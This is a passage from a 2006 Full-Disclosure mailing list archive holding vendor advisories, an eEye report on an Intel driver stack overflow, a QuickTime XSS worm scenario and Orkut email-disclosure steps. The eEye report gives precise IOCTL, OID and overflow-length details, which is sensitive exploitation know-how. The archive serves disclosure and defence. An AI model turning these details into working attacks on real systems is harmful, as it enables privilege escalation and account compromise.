50d8fd9c5715ff78b7db0e5f20d08550 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.4_amd64.deb Size/MD5: 1066564 f3c60d096d2ea85b02f8898660ab7997 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.2.2-1ubuntu2.4_amd64.udeb Size/MD5: 140308 5f18581d5ab54d33f2d69b079985c599 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.4_i386.deb Size/MD5: 981652 8497f389c4feb73d10ff8c82810b2659 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.2.2-1ubuntu2.4_i386.udeb Size/MD5: 120282 a0001759aec7eb6317d8bd0656078ff6 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.4_powerpc.deb Size/MD5: 1054114 565e5af4a14baed975050837af3d600b http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.2.2-1ubuntu2.4_powerpc.udeb Size/MD5: 130160 d97f253e9f24a3f831b31d1fae25a67c sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.4_sparc.deb Size/MD5: 994418 15ec9d7565fd5a2ba18ca8cbd03357f8 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.2.2-1ubuntu2.4_sparc.udeb Size/MD5: 127412 028eaa2d4ca1c8d96eefaa663f853290 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.2.diff.gz Size/MD5: 27943 c2dd800ba7a267e9ec69316c7d5c5326 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.2.dsc Size/MD5: 697 c095b5eee6408adc65d88a26b124c026 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3.orig.tar.gz Size/MD5: 4320394 fcdf572a33dd037653707b128dd150a7 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg/gnupg-udeb_1.4.3-2ubuntu3.2_amd64.udeb Size/MD5: 379922 56441176d8767b88d240284ea8c10b20 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.2_amd64.deb Size/MD5: 1112292 1ff2c321882324dc5d8b1b527a4131e2 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.3-2ubuntu3.2_amd64.udeb Size/MD5: 142630 a0d0bbb95df1652697e8c5dfce3abd6d i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg/gnupg-udeb_1.4.3-2ubuntu3.2_i386.udeb Size/MD5: 357610 2b83faf2418ae37d1f9b9d05948b98e2 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.2_i386.deb Size/MD5: 1055760 8034b6cd5cd73f7de7e7325b4e7d4603 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.3-2ubuntu3.2_i386.udeb Size/MD5: 129146 deb3e977a44c7ec6e9ebd279285d391c powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg/gnupg-udeb_1.4.3-2ubuntu3.2_powerpc.udeb Size/MD5: 372524 1385f1d9a1874d457ec7f41bb6f88028 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.2_powerpc.deb Size/MD5: 1107338 38c9a6fca86bf659781f8117ac80fa0b http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.3-2ubuntu3.2_powerpc.udeb Size/MD5: 136288 002befb66b791fdac4889095dbc67d1b sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg/gnupg-udeb_1.4.3-2ubuntu3.2_sparc.udeb Size/MD5: 366204 f350d40bceeebaf01a0f525aa33bb9ac http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.2_sparc.deb Size/MD5: 1042454 4b2f85afdea3cce9d837982badf7eb61 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.3-2ubuntu3.2_sparc.udeb Size/MD5: 132764 194f8cb7439efed249d84d39e4d27abc -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061206/f274b5d3/attachment.bin From kokanin at gmail.com Thu Dec 7 02:31:13 2006 From: kokanin at gmail.com (=?ISO-8859-1?Q?Knud_Erik_H=F8jgaard?=) Date: Thu, 7 Dec 2006 03:31:13 +0100 Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash from Nmap scan In-Reply-To: References: Message-ID: > The Linksys WIP 330 VoIP wireless phone will crash when a full > port-range Nmap scan is run against its IP address. oh crap so does this shitty sipoora box! i will turn it off now to avoid hakkings! From kokanin at gmail.com Thu Dec 7 02:29:47 2006 From: kokanin at gmail.com (=?ISO-8859-1?Q?Knud_Erik_H=F8jgaard?=) Date: Thu, 7 Dec 2006 03:29:47 +0100 Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash from Nmap scan In-Reply-To: References: Message-ID: > The Linksys WIP 330 VoIP wireless phone will crash when a full > port-range Nmap scan is run against its IP address. surprise! the zyxel something 2200 will die from malformed packets! WOW! CALL THE INTARWEB POLIECE! CALL ZYXEL POLICE, THEIR STUFFZ DON'T LIKE WEIRD PACKETZ! From shawnmer at gmail.com Thu Dec 7 03:43:02 2006 From: shawnmer at gmail.com (Shawn Merdinger) Date: Wed, 6 Dec 2006 19:43:02 -0800 Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash from Nmap scan In-Reply-To: References: Message-ID: No better/worse than this I suppose. http://www.cisco.com/warp/public/707/cisco-response-20060113-ip-phones.shtml Thanks, --scm On 12/6/06, Knud Erik H?jgaard wrote: > > The Linksys WIP 330 VoIP wireless phone will crash when a full > > port-range Nmap scan is run against its IP address. > > surprise! the zyxel something 2200 will die from malformed packets! > WOW! CALL THE INTARWEB POLIECE! CALL ZYXEL POLICE, THEIR STUFFZ DON'T > LIKE WEIRD PACKETZ! > From degeneracypressure at gmail.com Thu Dec 7 05:20:06 2006 From: degeneracypressure at gmail.com (Eliah Kagan) Date: Thu, 7 Dec 2006 00:20:06 -0500 Subject: [Full-disclosure] Hail list! In-Reply-To: <001a01c71907$a4d0c7c0$ee725740$@com> References: <001a01c71907$a4d0c7c0$ee725740$@com> Message-ID: <3da3d8310612062120g1dada3cbjf1bc0f9160dca8c4@mail.gmail.com> On 12/6/06, aNub15 wrote: > 2. Looking for a low footprint windows firewall that's only supposed to do > one thing. If someone hits port 110, block the I.P for a week? (should take > care of most portscanners (skiddies)). And no I'm not worried about blocking > real users on the box. Has it occurred to you that someone could send spoofed SYN packets with port 110 as the destination, and any IP as the source? Maybe you should worry about blocking real users after all. If there is an IP range where you know you have no legitimate users, you should instead block that IP range. Any IP range where you might have legitimate users is a range that someone could deny access to easily. Except actually it would be you denying access to them--a person attacking you in that way would would likely not even be legally responsible (but I am not a lawyer). Also, why would that prevent access by most people scanning your ports? Suppose someone is scanning your entire subnet, for instance, but only on port 22. Or someone could scan lots of ports on your box, and notice that plenty were open until 110 was probed. This person could then think one of three things: (1) Hmm, I guess that's all the ports open on that box. (2) Hmm, lots of ports open, and then I scan port 110, and the rest are all closed/filtered. (This is specially likely if it is the person's *second* scan.) There must be something nice and juicy on that box. I will scan the rest of the ports from another IP and then penetrate any service I can and find out why such a strange measure of pseudo-security is in place. (3) Hmm, I was reading Full Disclosure recently and somebody was asking about how to blacklist IPs for a week that send traffic to port 110. I bet this is the box of the guy who wanted to know how to do it. Let's find out why he wanted to do that... > www.supernoia.com Script kiddies and anybody else who likes portscanning thank you for the heads up. If you are going to implement this almost certainly bad idea--and it is for that server--you may wish to at least make it a different port. -Eliah From pdp.gnucitizen at googlemail.com Thu Dec 7 03:29:38 2006 From: pdp.gnucitizen at googlemail.com (pdp (architect)) Date: Thu, 7 Dec 2006 11:29:38 +0800 Subject: [Full-disclosure] New MySpace worm could be on its way Message-ID: <6905b1570612061929u39e44839kb338281ada273409@mail.gmail.com> http://www.gnucitizen.org/blog/myspace-quicktime-worm-follow-up MySpace was hit by a worm in a semi-automatic manner. This time the worm propagated via a QuickTime flaw found a couple of months ago. This shouldn't be a surprise to anyone. It is quite serious that this attack vector was picked up by Apple so late. In this post I am not going to explain how this particular MySpace hack works but rather to send a reminder to the security community that another QuickTime XSS vector was found right after the first one. This vector can be used in a similar way although, IMHO, the impact is greater. I guess Apple should fix both issues NOW: we don't want MySpace worms spreading around again, although this is very utopic to say. Here is a brief reminder of what the XSS issue was all about. The problems is caused by a quite useful feature called QuickTime Media Link (.qtl). The whole point of these QuickTime Media Link files is to provide means of playing media files in a more accessible way. In this respect the developer can create a .qtl file which holds information about the media content that needs to be played plus recommended dimensions, accessibility features, control features etc... .qtl files can contain malicious JavaScript code that can takeover some important network device when executed for example. That's not the end of the story though. Because of its flexibility QuickTime doesn't mind if Media Link (.qtl) files end with .mp3, .mp4, .m4a or even .mov extension... This is a quite big problem especially in default configurations of iTunes. The iTunes installation wizard installs the QuickTime player and QuickTime browser plugins and associates various media files with its components. If you open an mp3 file from the desktop it will be played in iTunes player by default, however if you open it from some website it will be played in the QuickTime player browser plugin. In this respect, users who are previewing mp3 and other media files from the Internet are vulnerable. GNUCITIZEN >> Backdooring MP3 Files To sum up, and put into context, attackers can use QuickTime Media Links to imitate popular media files and as such trick the user into opening malicious content that could lead to their (MySpace) account or their browser being compromised. Lets look at the following hypothetical situation: "Evil Hacker decides to overtake MySpace in order to DoS google.com. He finds that MySpace allows users to supply links in their posts and comments. He spends some time to research the 1000 most popular MySpace members where he will post links to media files titled orgy.mov or myconfession.mp3 or even prankster.avi. Once an unaware user clicks on the link, a phishing page is presented asking the current user to enter their MySpace details to see the private content. If the user is tricked, their credentials will be on their way to the specifically designed for that operation collection point where another automatic process overtakes their user account installing the same malicious file or simply hijack other media files by wrapping them up in QuickTime Media Links the same way it is described in the article mentioned above. The process repeats when another users falls into the trap. When enough number of accounts are compromised Evil Hacker will launch his/her DDoS against Google's AdSense server farm." Before seeing more worms of this kind I suggest that we gather our intellectual power to find a fix or at least a workaround. I welcome you to join me at GNUCITIZEN's MySpace Worms Topic for further discussion. I can assure you that GNUCITIZEN neither me has anything to do with MySpace or any other related organization. The purpose of this symposium is learn more about these types of worms and help other online applications and communities protect themselves. This is much better than just sitting in our comfy chairs and laughing at people's mistakes. Many thanks. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org From jaervosz at gentoo.org Thu Dec 7 11:04:09 2006 From: jaervosz at gentoo.org (Sune Kloppenborg Jeppesen) Date: Thu, 7 Dec 2006 12:04:09 +0100 Subject: [Full-disclosure] [ GLSA 200612-01 ] wv library: Multiple integer overflows Message-ID: <200612071204.14142.jaervosz@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200612-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: wv library: Multiple integer overflows Date: December 07, 2006 Bugs: #153800 ID: 200612-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== The wv library is vulnerable to multiple integer overflows which could lead to the execution of arbitrary code. Background ========== wv is a library for conversion of MS Word DOC and RTF files. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-text/wv < 1.2.3-r1 >= 1.2.3-r1 Description =========== The wv library fails to do proper arithmetic checks in multiple places, possibly leading to integer overflows. Impact ====== An attacker could craft a malicious file that, when handled with the wv library, could lead to the execution of arbitrary code with the permissions of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All wv library users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/wv-1.2.3-r1" References ========== [ 1 ] CVE-2006-4513 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4513 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200612-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061207/499078f5/attachment.bin From xwings.net at gmail.com Thu Dec 7 02:25:22 2006 From: xwings.net at gmail.com (KaiJern Lau) Date: Thu, 7 Dec 2006 10:25:22 +0800 Subject: [Full-disclosure] =?windows-1252?q?Joke=2C_Full_Version=2C_0_day_?= =?windows-1252?q?exploit_for_=93PING=94?= Message-ID: Hi, Something to share with everyone :) Still remember the the last post that i have posted ? Sometimes script kiddies is always a script kiddies. They never want to read, i guess that is the reason why they can't code. After the ping exploit post this fellow did some reply and try to prove himself. I guess he just don't know what, for all the comments he posted need to "approved" by me before it came to the page. This morning i got another stuff from him, *Before we launch we have to own alot of boxes means we have to orginize the drones army.Like Masters and slaves(zombies).By the way, there is no concept "bypass" in firewall. YOu cannot bypass the firewall.But you can fool the firewall by legiminate connection,since firewall only work on ip address and port:-).Even if you use IDS or IDP you cannot stop it as long as the attacker is generating legiminate packets.:)Please remember DOS can be protected by updating but there is no IDS/IDP singature to stop the DDOSing.If you go out to real life network you will see there are alot of hidden devices. In real world, there are alot of huge networks are suffering DDosing everyday. Please remember i also won't attack your low profile network unless someone pay me.I also don't want to tell you guyz how to fool back the attacker bocs' i don't want to share anything with you guyz. If you are a real hacker you won't saying or swearing anymore. you already own them.the fact that you are boasting on your 0wn blog is you cannot even hack your own box.Bro please grown up. hacker never say that he is a hacker.OK?* First of all, we are talking about exploits developments. There is nothing to do with DDOS . Secondly, i guess we all know what is DDOS and how is works. There is alot of ways we don't need to own alot of box to DDOS a server. Owning one big site will do. Remember the SWF DDOS ? Third, * hacker never say that he is a hacker*, did he mentions about he is a hacker too ? Lastly. anybody wants his msn id ? ------------------------------ Source : http://blog.xwings.net/?p=34 ** -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061207/608cbb26/attachment.html From jan.monsch at iplosion.com Thu Dec 7 16:29:27 2006 From: jan.monsch at iplosion.com (Jan P. Monsch) Date: Thu, 7 Dec 2006 17:29:27 +0100 Subject: [Full-disclosure] Some Thoughts about Office Open XML and Malware Detection Message-ID: <010d01c71a1c$e038e520$8210a8c0@moon1> Hi Last week I have been googling around for comments and reactions from my report "Malware Detection Rate in Alternative Word Formats" (http://www.iplosion.com/archives/3) which was posted in the ISC diary on August 23rd, 2006 (http://isc.sans.org/diary.php?storyid=1630). To sum it up there has not been a lot of reactions in magazines or the like but it got at least the attention of the malware research community. There is this very interesting follow-up article from Christoph Alme in the October 2006 edition of the Virus Bulletin. The two page article "Scanning Embedded Objects in Word XML Files" (http://www.securecomputing.com/pdf/CAlme_VBOct06.pdf) which elaborates how AV products can identify embedded objects in Word XML files. He shows that XML documents can be manipulated slightly, within the flexibility offered in the XML standard, and still are considered valid Word documents. Using the same VirusTotal-based testing method as I did, he demonstrates that all existing AV products can be bypassed. As you might remember my initial paper there were only three AV products capable of finding embedded malware in my run-of-the-mill XML documents. So what does this tell us: The most likely reason is that these three virus scanners do not really understand XML document format. They most likely have no XML parser integrated or the parser only implements the XML standard partially. This once again melts down to the conclusion that the decoding capability is the name of the game. Now let us speculate that AV products will integrate a complete off-the-shelf XML parser. Will this help? Well it will help to properly decode XML documents but it will most likely introduce new vulnerabilities in AV products so far unheard of. (Actually the motivation I am writing this article is to prevent AV vendors to release such broken products). Let us take XML external DTD references as an example. If the XML parsers are used in default configuration or are not configured properly, scanning an XML with an external reference will result in requests to external sites. That is nice. This would allow an attacker to track malware distribution or download additional exploit files to the scanning system. With the release of Office 2007 a couple of days ago, which will have the Office Open XML format as standard storage format, the urge for XML enabled AV products will grow. My retesting today shows that the detection rate of Netsky as an embedded object in a Office 2003 Word XML is still at the same level as 3 months ago. I fear that the AV industry is not quite yet ready to protect their customers against XML delivered attacks. Kind regards Jan P. Monsch From kees at ubuntu.com Thu Dec 7 20:31:39 2006 From: kees at ubuntu.com (Kees Cook) Date: Thu, 7 Dec 2006 12:31:39 -0800 Subject: [Full-disclosure] [USN-393-2] GnuPG2 vulnerabilities Message-ID: <20061207203139.GR6550@outflux.net> =========================================================== Ubuntu Security Notice USN-393-2 December 07, 2006 gnupg2 vulnerabilities CVE-2006-6169, CVE-2006-6235 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.10: gnupg2 1.9.21-0ubuntu5.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-389-1 and USN-393-1 fixed vulnerabilities in gnupg. This update provides the corresponding updates for gnupg2. Original advisory details: A buffer overflow was discovered in GnuPG. By tricking a user into running gpg interactively on a specially crafted message, an attacker could execute arbitrary code with the user's privileges. This vulnerability is not exposed when running gpg in batch mode. (CVE-2006-6169) Tavis Ormandy discovered that gnupg was incorrectly using the stack. If a user were tricked into processing a specially crafted message, an attacker could execute arbitrary code with the user's privileges. (CVE-2006-6235) Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnupg2/gnupg2_1.9.21-0ubuntu5.2.diff.gz Size/MD5: 39057 24885457e44f2061c1a2ef98047357d4 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg2/gnupg2_1.9.21-0ubuntu5.2.dsc Size/MD5: 839 5786619a42c6768da183ec2c39d70541 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg2/gnupg2_1.9.21.orig.tar.gz Size/MD5: 2290952 5a609db8ecc661fb299c0dccd84ad503 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg2/gnupg-agent_1.9.21-0ubuntu5.2_amd64.deb Size/MD5: 193748 57618f27a79f42a3e9f66705ed0ab151 http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg2/gnupg2_1.9.21-0ubuntu5.2_amd64.deb Size/MD5: 787166 9641af8af591a9d61c3d9d77144aa320 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg2/gpgsm_1.9.21-0ubuntu5.2_amd64.deb Size/MD5: 333002 a6d5f35e4fc7dc4c6a837862b269ddc1 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg2/gnupg-agent_1.9.21-0ubuntu5.2_i386.deb Size/MD5: 176170 3dc1e0b862fbf76905b61b20132812de http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg2/gnupg2_1.9.21-0ubuntu5.2_i386.deb Size/MD5: 737818 ab6d004d7fbf1b0850e6f6f4f09771d4 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg2/gpgsm_1.9.21-0ubuntu5.2_i386.deb Size/MD5: 304798 1d6b309f0690685ffa95d219750033dc powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg2/gnupg-agent_1.9.21-0ubuntu5.2_powerpc.deb Size/MD5: 190614 16cd71ed4d92b1203806ba50e638e9e0 http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg2/gnupg2_1.9.21-0ubuntu5.2_powerpc.deb Size/MD5: 773762 56903ee4d39929254b3a4ac06a56a2c5 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg2/gpgsm_1.9.21-0ubuntu5.2_powerpc.deb Size/MD5: 324332 6b9152bd5753f974161c298d6fd6f894 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg2/gnupg-agent_1.9.21-0ubuntu5.2_sparc.deb Size/MD5: 174144 2e5e21144005113345e3abeef2b50496 http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg2/gnupg2_1.9.21-0ubuntu5.2_sparc.deb Size/MD5: 726244 5dc2d8b804a2a5276344b151a46e1346 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg2/gpgsm_1.9.21-0ubuntu5.2_sparc.deb Size/MD5: 297640 5c27421fb28c63abac748419a05220bb -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061207/7950ab2b/attachment.bin From rajesh.sethumadhavan at yahoo.com Thu Dec 7 21:04:24 2006 From: rajesh.sethumadhavan at yahoo.com (Rajesh Sethumadhavan) Date: Thu, 7 Dec 2006 13:04:24 -0800 (PST) Subject: [Full-disclosure] Orkut Email Address Disclosure Vulnerability Message-ID: <960569.53481.qm@web37208.mail.mud.yahoo.com> Orkut Email Address Disclosure Vulnerability ##################################################################### XDisclose Advisory : XD100097 Vulnerability Discovered: November 30th 2006 Advisory Released : December 8th 2006 Credit : Rajesh Sethumadhavan Class : Information Disclosure Severity : Highly Critical Solution Status : Unpatched Vendor : Google Inc Vendor Website : http://www.orkut.com Affected applications : Orkut Services Affected Platform : All ##################################################################### Overview: Orkut is an Internet social network service run by Google and named after its creator, Orkut B?y?kk?kten. It claims to be designed to help users meet new friends and maintain existing relationships with pictures and messages, and establish new ones by reaching out to people you've never met before. Orkut service is vulnerable to email address disclosure vulnerabilities. Due to this It is possible to get email address of any users in orkut. This is caused due to improper designing of orkut portal. Description: A remote attacker can get the email address of anyone in the orkut as demonstrated below. The victim interaction is not required at all. Demonstration: Note: Demonstration leads to email address information disclosure - Login to your orkut account - Add any user as your friend (Person you want to get email address) - Click 'friends' tab - Click 'open friend requests' tab - Click edit button the email address of the user will be displayed as in the screenshot Same way your can find your friends email address also Solution: Orkut can improve their portal design by hiding the users email address Screenshot: http://www.xdisclose.com/images/xdorkutemailid.jpg Impact: Successful exploitation allows email address disclosure. Original Advisory: http://www.xdisclose.com/XD100097.txt Credits: Rajesh Sethumadhavan has been credited with the discovery of this vulnerability Disclaimer: This entire document is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk. The exploit code is to be used on your own orkut account. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. --------------------------------- Want to start your own business? Learn how on Yahoo! Small Business. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061207/d45ab901/attachment.html From Advisories at eeye.com Thu Dec 7 23:09:15 2006 From: Advisories at eeye.com (eEye Advisories) Date: Thu, 7 Dec 2006 15:09:15 -0800 Subject: [Full-disclosure] EEYE: Intel Network Adapter Driver Local Privilege Escalation Message-ID: eEye Research - http://research.eeye.com Intel Network Adapter Driver Local Privilege Escalation Release Date: December 7, 2006 Date Reported: July 10, 2006 Severity: Medium (Local Privilege Escalation to Kernel) Systems Affected: Windows 2000, XP, 2003, Vista Intel PRO 10/100 - 8.0.27.0 or previous Intel PRO/1000 - 8.7.1.0 or previous Intel PRO/1000 PCI - 9.1.30.0 or previous Linux Intel PRO 10/100 - 3.5.14 or previous Intel PRO/1000 - 7.2.7 or previous Intel PRO/10GbE - 1.0.109 or previous UnixWare/SCO6 Intel PRO 10/100 - 4.0.3 or previous Intel PRO/1000 - 9.0.15 or previous Overview: eEye Digital Security has discovered a vulnerability in all Intel network adapter drivers ("NDIS miniport drivers") that could allow unprivileged code executing on an affected system to gain unfettered, kernel-level access. For instance, a malicious user, malware, or exploit payload taking advantage of an unrelated vulnerability could additionally exploit this vulnerability in order to completely compromise a system at the kernel level. The vulnerability is a simple strcpy-based stack buffer overflow within the Intel miniport driver, and can be reliably exploited on all versions of Windows in order to execute arbitrary code. Technical Details: Despite the low level occupied by NDIS miniport drivers, it is possible for unprivileged user-mode code to communicate with them via NDIS-brokered requests for network adapter statistics. An IOCTL_NDIS_QUERY_SELECTED_STATS (0x17000E) request made to "\Device\{adapterguid}" will cause NDIS.SYS to invoke the QueryInformationHandler routine registered by the miniport driver in its call to NdisMRegisterMiniport. The input buffer supplied with this IOCTL is a list of 32-bit OIDs corresponding to the statistics of interest, each of which is passed individually to QueryInformationHandler, which contains the code necessary to retrieve the statistic and return it in the provided output buffer. In the case of Intel miniport drivers, certain OID handlers will process the contents of the output buffer. On Windows 2000, a pointer to the user-supplied buffer is passed directly to the miniport driver, meaning this data is under user control. (Windows XP and later passes in a pointer to a temporary buffer in kernel memory containing undefined data, which can be controlled by "seeding" pool memory from user-mode prior to attempting exploitation.) The handler for OID 0xFF0203FC attempts to copy a string from the output buffer into a stack variable using essentially the following strcpy operation: strcpy(&(var_1D4.sz_62), (char*)InformationBuffer + 4) Therefore, supplying a 0x17A-character string (at offset +0x0C within the output buffer, because NDIS uses the first 8 bytes for its own purposes) will cause the handler function's return address to be entirely overwritten, allowing execution to be redirected to an arbitrary user- or kernel-mode address. Despite vendor sentiment to the contrary, it should be understood that driver flaws really are and have always been a major threat. Local exploitation of this vulnerability will result in arbitrary code execution, providing a level of access that amounts to "the keys to the kingdom." Protection: Retina - Network Security Scanner has been updated to identify this vulnerability. Vendor Status: Intel has released a patch for this vulnerability which is available at http://support.intel.com/support/network/sb/CS-023726.htm. Credit: Derek Soeder Related Links: Retina - Network Security Scanner - Free Trial: http://www.eeye.com/html/products/retina/download/index.html Blink - Unified Client Security Personal - Free For Home Use: http://www.eeye.com/html/products/blink/personal/download/index.html Blink - Unified Client Security Professional - Free Trial: http://www.eeye.com/html/products/blink/download/index.html Greetings: F1: the very best of luck to you. To Gliko and to Mr. and Mrs. Mike: congrats! cDc for holding the best Vegas party. TA, WC, MF, DKP, DM, BN, MP, CSam, HTP, RS, SY, and the G in GUI. Copyright (c) 1998-2006 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert at eEye.com for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. From ronald at rmacd.com Thu Dec 7 22:07:19 2006 From: ronald at rmacd.com (Ronald MacDonald) Date: Thu, 7 Dec 2006 22:07:19 +0000 Subject: [Full-disclosure] Orkut Email Address Disclosure Vulnerability In-Reply-To: <960569.53481.qm@web37208.mail.mud.yahoo.com> References: <960569.53481.qm@web37208.mail.mud.yahoo.com> Message-ID: <85963be10612071407u38051d26u5dbcfd327d0e4f5e@mail.gmail.com> Hi Rajesh, > Description: > A remote attacker can get the email address of anyone in the orkut as > demonstrated below. The victim interaction is not required at all. > > Demonstration: > Note: Demonstration leads to email address information disclosure > - Login to your orkut account > - Add any user as your friend (Person you want to get email address) > - Click 'friends' tab > - Click 'open friend requests' tab > - Click edit button the email address of the user will be displayed > as in the screenshot > Same way your can find your friends email address also It's not an 'exploit' but a 'feature' of the portal that orkut uses on its website, and is no more serious than posting your email address on a mailing list. Regards, Ronald. -- Ronald MacDonald http://www.rmacd.com/ 0777 235 1655 From juha-matti.laurio at netti.fi Fri Dec 8 01:20:11 2006 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Fri, 8 Dec 2006 03:20:11 +0200 (EET) Subject: [Full-disclosure] Microsoft Word 0-day Vulnerability FAQ (CVE-2006-5994) written Message-ID: <14768356.1149001165540811806.JavaMail.juha-matti.laurio@netti.fi> I have posted Frequently Asked Questions document about the unpatched Microsoft Word zero-day vulnerability. The document entitled as Microsoft Word 0-day Vulnerability FAQ - December 2006, CVE-2006-5994 is located at my SecuriTeam Blogs section, http://blogs.securiteam.com/?p=759 The document describes related Trojan downloader malwares and the state of upcoming fix etc. too. Regards, Juha-Matti Laurio Finland From matthew.flaschen at gatech.edu Fri Dec 8 02:38:53 2006 From: matthew.flaschen at gatech.edu (Matthew Flaschen) Date: Thu, 07 Dec 2006 21:38:53 -0500 Subject: [Full-disclosure] Orkut Email Address Disclosure Vulnerability In-Reply-To: <85963be10612071407u38051d26u5dbcfd327d0e4f5e@mail.gmail.com> References: <960569.53481.qm@web37208.mail.mud.yahoo.com> <85963be10612071407u38051d26u5dbcfd327d0e4f5e@mail.gmail.com> Message-ID: <4578D03D.5020808@gatech.edu> > It's not an 'exploit' but a 'feature' of the portal that orkut uses on > its website, and is no more serious than posting your email address on > a mailing list. While it's certainly not an exploit, it probably is a bug as well as a feature (like all email disclosure). Matt -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 250 bytes Desc: OpenPGP digital signature Url : 